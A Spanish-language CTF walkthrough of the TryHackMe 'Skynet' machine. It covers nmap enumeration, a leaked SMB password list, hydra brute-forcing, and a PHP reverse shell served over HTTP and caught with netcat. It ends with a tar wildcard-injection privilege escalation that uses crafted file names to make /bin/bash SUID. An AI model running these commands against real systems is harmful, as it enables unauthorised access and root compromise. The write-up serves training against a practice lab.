Zona Hacking — Writeups de CTFs y Seguridad Ofensiva

Sistema operativo	Dificultad	Fecha de Lanzamiento	Creador
Linux	Easy	-	TryHackme

Reconocimiento

Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

skynet

Enumeración inicial

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.19.80                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 14:27 -03
Initiating SYN Stealth Scan at 14:27
Scanning 10.10.19.80 [65535 ports]
Discovered open port 445/tcp on 10.10.19.80
Discovered open port 110/tcp on 10.10.19.80
Discovered open port 139/tcp on 10.10.19.80
Discovered open port 22/tcp on 10.10.19.80
Discovered open port 80/tcp on 10.10.19.80
Discovered open port 143/tcp on 10.10.19.80
Completed SYN Stealth Scan at 14:27, 19.82s elapsed (65535 total ports)
Nmap scan report for 10.10.19.80
Host is up, received user-set (0.24s latency).
Scanned at 2025-03-26 14:27:03 -03 for 20s
Not shown: 58461 closed tcp ports (reset), 7068 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 63
80/tcp  open  http         syn-ack ttl 63
110/tcp open  pop3         syn-ack ttl 63
139/tcp open  netbios-ssn  syn-ack ttl 63
143/tcp open  imap         syn-ack ttl 63
445/tcp open  microsoft-ds syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
           Raw packets sent: 96795 (4.259MB) | Rcvd: 64019 (2.567MB)

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.

nmap -sCV -p22,80,110,139,143,445 -oN servicesScan 10.10.19.80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 14:28 -03
Nmap scan report for 10.10.19.80 (10.10.19.80)
Host is up (0.23s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP AUTH-RESP-CODE CAPA SASL RESP-CODES PIPELINING UIDL
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 LITERAL+ post-login more have OK SASL-IR LOGIN-REFERRALS capabilities Pre-login listed ID IDLE ENABLE LOGINDISABLEDA0001
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-03-26T17:31:03
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2025-03-26T12:31:03-05:00
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h42m05s, deviation: 2h53m12s, median: 2m04s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.71 seconds

Explotación inicial

Samba (445)

skynet

attention.txt

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

log1.txt

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

skynet

Realizamos un ataque de fuerza bruta con hydra.

skynet

milesdyson:cyborg007haloterminator

skynet

Realizamos web fuzzing y encontramos el path administrator

skynet

PoC

skynet

cp /usr/share/webshells/php/php-reverse-shell.php .

skynet

Creamos un servidor http con python para compartir la reverse shell.

python3 -m http.server 80

Nos ponemos en escucha con Netcat por el puerto 4444

nc -lnvp 4444

skynet

Elevación de privilegios

skynet

echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh"  
touch "/var/www/html/--checkpoint=1"

Post Explotación

Leemos el flag de root.

skynet

Skynet Skynet

Reconocimiento

Enumeración inicial

Explotación inicial

Samba (445)

attention.txt

log1.txt

PoC

Elevación de privilegios

Post Explotación

Skynet